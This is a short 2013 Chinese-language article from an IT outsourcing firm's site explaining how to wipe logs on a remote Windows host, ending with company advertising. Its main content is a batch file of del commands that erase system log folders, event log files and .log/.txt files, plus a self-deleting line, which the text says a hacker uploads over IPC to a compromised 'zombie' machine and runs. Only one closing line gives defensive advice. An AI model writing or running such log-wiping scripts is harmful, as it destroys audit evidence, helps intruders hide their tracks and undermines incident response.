怎么清除遠程主機上的日志？

2013-09-16 10:16 作者：ly 瀏覽量：

　　今天艾銻無限給大家介紹的清除遠程主機上的日志的方法是：自己編寫批處理文件來實現。

　　編寫一個能清除日志的批處理非常簡單，新建一個文本文檔，在其中輸入以下內容： 

   @del c:\windows\system32\logfiles\*.* 

   @del c:\windows\system32\config\*.evt 

   @del c:\windows\system32\dtclog\*.* 

   @del c:\windows\system32\*.log 

   @del c:\windows\system32\*.txt 

   @del c:\windows\*.txt 

   @del c:\windows\*.log 

   @del c:\del log.bat （實際使用時，視具體位置而定）

   把上面的內容保存為log.bat備用。在上面的代碼中“@”前綴字符表示執行時本行在命令行或DOS里面不顯示。之后黑客通過IPC連接將log.bat文件上傳到被入侵主機或肉雞上，將log.bat文件執行以下就可以了。

　　除此之外，還可以利用第三方軟件等方法來實現清理目的，大體原理都一樣。作為管理員應定期備份日志文件，防止被入侵后清空日志。另外可以把日志文件的路徑更改，預防黑客用批處理文件清理日志。

艾銻無限是國內領先IT外包服務商，專業為企業提供IT運維外包、電腦維護、網絡維護、辦公設備維護、服務器維護、數據備份恢復，門禁監控等多項IT外包服務。做為一家企業IT服務提供商，我們有責任也有義務為企業提供IT外包的相關信息，為企業的發展提升更高的效率，創造更大價值。歡迎您來電咨詢：400-650-7820. 更多的IT外包信息盡在艾銻無限 http://www.dyfgwiyq.cn